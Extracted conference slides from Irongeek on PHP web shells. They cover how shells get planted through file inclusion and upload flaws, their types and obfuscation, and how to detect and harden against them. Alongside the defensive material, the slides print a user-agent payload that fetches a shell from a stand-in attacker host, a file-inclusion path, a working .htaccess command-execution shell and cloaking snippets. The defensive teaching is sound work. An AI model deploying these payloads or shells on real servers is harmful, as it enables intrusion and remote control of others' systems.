2.
I run Irongeek.com
I have an interest in InfoSec
education
I don’t know everything - I’m just a
geek with time on my hands
Sr. Information Security Engineer at
Diebold, doing managed services
and pen-test work
Co-Founder of Derbycon
http://www.derbycon.com
http://Irongeek.com
Twitter: @Irongeek_ADC
3.
Scripts that act as back doors for maintaining access
Common tasks:
File Management
Command line access
Database server access
Bruteforcing
Network Scanning
Pivots
Versions for all sorts of web development environments:
PHP, ASP.NET, JSP, etc.
Think of it as a RAT (Remote Access Tool/Trojan) for the web
http://Irongeek.com
4.
I wanted to be like Jason Scott…and failed
Attribution is hard
Old security warning from 1994
http://techpubs.sgi.com/library/dynaweb_docs/0620/SGI_Developer
/books/NetscapeSrv_PG/sgi_html/ch01.html
Versions of C99 labled “!C99Shell v. 1.0 beta (21.05.2005)!”
Search for c99shell before 1/01/2005 turns up plenty of
shells, but not historical information
Seems to tie to 7/26/1997 (Jul 26, 1997)
filetype:txt PHP daterange:2450654-2450656
http://Irongeek.com
5.
My first experiences were at a school where we
could put up homepages that used PHP
shell_exec($command) for the win!
Shoveling a Shell using PHP Insecurities
(2/12/2004)
http://www.irongeek.com/i.php?page=security/phpshell
I’ve been pwned by them before
http://Irongeek.com
6.
File upload vulnerabilities
Insecure FTP
Command Injection
Remote File Includes/Local File Includes
Exploits on other sites on the same shared host
Other Exploits
SQL Injection
Vulnerable services
http://Irongeek.com
7. 1. Client makes a request to a site
with an RFI vulnerability
2. Vulnerable web server grabs
malicious file off of another server
3. File is included in code executed
on the vulnerable web server
4. Attacker then executes commands
on the remote vulnerable web
server, uploads different shells,
grabs files, etc.
http://Irongeek.com
8.
Set browser’s user agent to:
<?php system(‘wget
http://attackerssite.com/shell.txt -O shell.php’);?>
LFI with:
http://somesite.com/index.php?page=../../../../pro
c/self/environ
More at
http://www.brianhaddock.com/2011/gaining-shellaccess-via-local-file-inclusion-vulnerabilities
http://Irongeek.com
10.
Started as a project to show off web vulnerabilities
Like WebGoat, but designed to be easier to use and
PHP based
I started it, but Jeremy Druin is in charge of it now
and has way more code in it than I do
http://Irongeek.com
16.
Ran periodically by a cron job
Reads lines from recent access logs
Greps for likely RFIs, then adds them to old unique RFIs and
makes sure they are still unique
Request contains “=http://” (and https)
Requested file ends in txt|.inc|.dat|.bak
Checks to see if they are still active
Outputs the attacker IP, whois link, URL to webshell, referer,
time, etc.
Saves uniques for later
If it does not error out, and the file does not exist, it makes
an archive copy
http://Irongeek.com
17. Why not let the hosting site know they are serving a
shell?
User Agent String:
Hello, I'm not attacking your site, but someone else tried using
this file on your server as an RFI against my site. Contact
Irongeek at Irongeek.com for more details
http://www.irongeek.com/i.php?page=webshells-and-rfi
http://Irongeek.com
18.
Uploaders
General Webshells
Testers/IDers
Search Engine Spammers
Just show the links to search engines based on user agent strings to
get higher ranking via back links
Booters
Just emails the attacker that a site in vulnerable, maybe gives a bit of
information about the system
Botnets based on webshells
Webservers generally have more bandwidth than workstations
Local rooters
Elevate privileges using local exploits
http://Irongeek.com
19.
gzinflate() / gzdeflate()
Meant to allow for compressed data
base64_decode() / base64_encode()
Meant to allow for binary data to me stored as printable
ASCII
Others: str_rot13() / rawurlencode() / strrev()
Truncated example:
<? eval(gzinflate(base64_decode('pZL ….OyA=')); ?>
Useful decoder:
https://defense.ballastsecurity.net/decoding/
http://Irongeek.com
21.
GET is in the URL, POST is in the request headers
POST method less likely to be logged than GET
With a custom client, stealth commands via:
Cookie headers
Non-cookie headers
Multiple levels of obfuscation making it computationally
expensive to decode
http://Irongeek.com
23.
Available at: https://github.com/epinna/Weevely
Tiny, encrypted, communication over cookies, tons
of modules:
Enumerate users and /etc/passwd
content
Check php security configurations
Crawl and enumerate web folders files
permissions
Find wrong system files permissions
Guess files with wrong permissions in
users home folders
Bruteforce all SQL users
Bruteforce SQL username
Collect system informations
Send reverse TCP shell
Open a shell on TCP port
Execute system shell command
http://Irongeek.com
Execute PHP statement
Mount remote filesystem using HTTPfs
Change file timestamps
Remove remote files and folders
Get SQL database dump
Run SQL console or execute single queries
Install and run Proxy to tunnel traffic
through target
Print interfaces addresses
Port scan open TCP ports
Install remote PHP proxy
Find files with write
Find files with superuser flags
24. # <!-- Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<FilesEmbed it in other scripts code that is already on
~ "^.ht">
Order allow,deny
site
Allow from all
Put
</Files> in an .htaccess file
the
See Eldar “Wireghoul” Marcussen’s work:
# Make .htaccess file be interpreted as php file. This occur after apache has
https://github.com/wireghoul/htshells
interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "--><form method='get'><input type='text'
name='c' value='".$_GET['c']."'><input type='submit' name='go'
value='Go!'></form>n<pre>";passthru($_GET['c']." 2>&1");echo "</pre>"; ?>
http://Irongeek.com
25.
Attackers don’t want others finding their shells and
using them
<?php if(preg_match("/bot/",
$_SERVER[HTTP_USER_AGENT]))
{header("HTTP/1.0 404");
exit("<h1>Not Found</h1>");}…
http://Irongeek.com
26. //Example from Laudanum
$allowedIPs = array("192.168.1.55", "12.2.2.2");
$allowed = 0;
foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1;
}
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
http://Irongeek.com
27.
How well do the think that will work for them?
<?php // This file is protected by copyright law
and provided under license. Reverse engineering
of this file is strictly prohibited. …
http://Irongeek.com
29.
Ugly, but works:
grep -i "=http://" access.log | grep -i
".txt|.inc.|.dat"
May like my script better
http://Irongeek.com
30.
Look for “bad” functions
grep -RPnl "(gzinflate|eval|base64_decode)"
/var/www/
No perfect list
Many false positives
http://Irongeek.com
31.
AV will mostly miss them
PHP-Shell-Detector
Just signature based to my knowledge
Scans: php/perl/asp/aspx
https://github.com/emposha/PHP-Shell-Detector
NeoPI
Detects on Signatures, Entropy, Longest Word and Index of
Coincidence
Scans: php/asp/aspx/sh/bash/zsh/csh/tsch/pl/py/cgi/cfm
https://github.com/Neohapsis/NeoPI
http://Irongeek.com
35.
Defaults may be ok, but stuff happens
Test installs like XAMPP may be ran as the user
Moving files from one place to another can have unintended
consequences
Shared hosting may have your site running under your
account, giving scripts permission to your files
Check for writable files?
find /var/www/ -user www-data -perm -u=w –ls
find /var/www/ -perm -2 -ls
Use with caution, just for world writeables:
find /var/www -type d -exec chmod 2775 {} +
find /var/www -type f -exec chmod 0664 {} +
http://Irongeek.com
36. Much of the following text copied from
/etc/php5/apache2/php.ini
http://Irongeek.com
37.
Allow ASP-style <% %> tags.
asp_tags = Off
http://php.net/asp-tags
PHP Banner in web server header
expose_php = On
http://php.net/expose-php
Whether to allow HTTP file uploads.
file_uploads = On
http://php.net/file-uploads
Display Errors
display_errors = On
http://php.net/display-errors
http://Irongeek.com
38.
Whether to allow the treatment of URLs (like http:// or
ftp://) as files.
allow_url_fopen = On
http://php.net/allow-url-fopen
Whether to allow include/require to open URLs (like http://
or ftp://) as files. (Off by default in now.)
allow_url_include = Off
http://php.net/allow-url-include
Disable easily abused functions
disable_functions=system,exec,passthru,shell_exec
http://php.net/manual/en/ini.core.php#ini.disablefunctions
http://Irongeek.com
39.
“DEPRECATED as of PHP 5.3.0 and REMOVED as of
PHP 5.4.0”
Many functions modified so UID of the script and
the files/directories operated on are the same.
Some functions like shell_exec() disabled
Others like exec() system() require the executable to
be in safe_mode_exec_dir
Way more details here:
http://www.php.net/manual/en/features.safemode.functions.php
http://Irongeek.com
40.
Host based WAF
Available at:
http://www.modsecurity.org
modsecurity_crs_45_trojans.conf
Changed my config to:
SecRuleEngine On
SecDefaultAction "phase:4,deny,log,status:500“
Signature based, so same rule applies as AV
http://Irongeek.com
41.
Turn off Directory indexing
Add this to .htaccess file or Directory configs:
Options -Indexes
An example of why:
http://www.google.com/?q=intitle:index.of+c99.txt
http://Irongeek.com
42.
Shared Hosting MD5 Change Detection Script
http://www.irongeek.com/i.php?page=security/sha
red-hosting-md5-change-detection-script
Script To Grep For RFI, Webshells, Password Grabs,
Web Scanners, Etc.
http://www.irongeek.com/i.php?page=security/log
watch-script-grep-for-rfis-webscanners-webshellattacks
http://Irongeek.com
43.
Writing a stealth web shell and .htaccess shells by Eldar “Wireghoul” Marcussen
http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html
http://www.justanotherhacker.com/projects/htshells/
Effectiveness of Antivirus in Detecting Web Application Backdoors by Rahul
“FB1H2S” Sasi
http://www.exploit-db.com/wp-content/themes/exploit/docs/16082.pdf
Detecting Obfuscated Web Shells Talk by Scott Behrens
http://www.youtube.com/watch?v=gRSKuAS71pI
Web Shell Detection Using NeoPI by Scott Behrens and Ben Hagen
http://resources.infosecinstitute.com/web-shell-detection/
Threat: DDoS Booter Shell Scripts
http://www.prolexic.com/pdf/Prolexic_Threat_Advisory_DDoS_Booter_Scripts_
052612.pdf
Booting the Booters, Stressing the Stressors - Allison Nixon and Brandon Leven
http://www.irongeek.com/i.php?page=videos/bsidesri2013/2-0-booting-thebooters-stressing-the-stressors-allison-nixon-and-brandon-levene
http://Irongeek.com
44. Derbycon
Sept 25th-29th, 2013
Derbycon Art Credits to DigiP
Photo Credits to KC (devauto)
http://www.derbycon.com
Others
http://www.louisvilleinfosec.com
http://skydogcon.com
http://hack3rcon.org
http://Irongeek.com
http://outerz0ne.org
http://phreaknic.info
http://notacon.org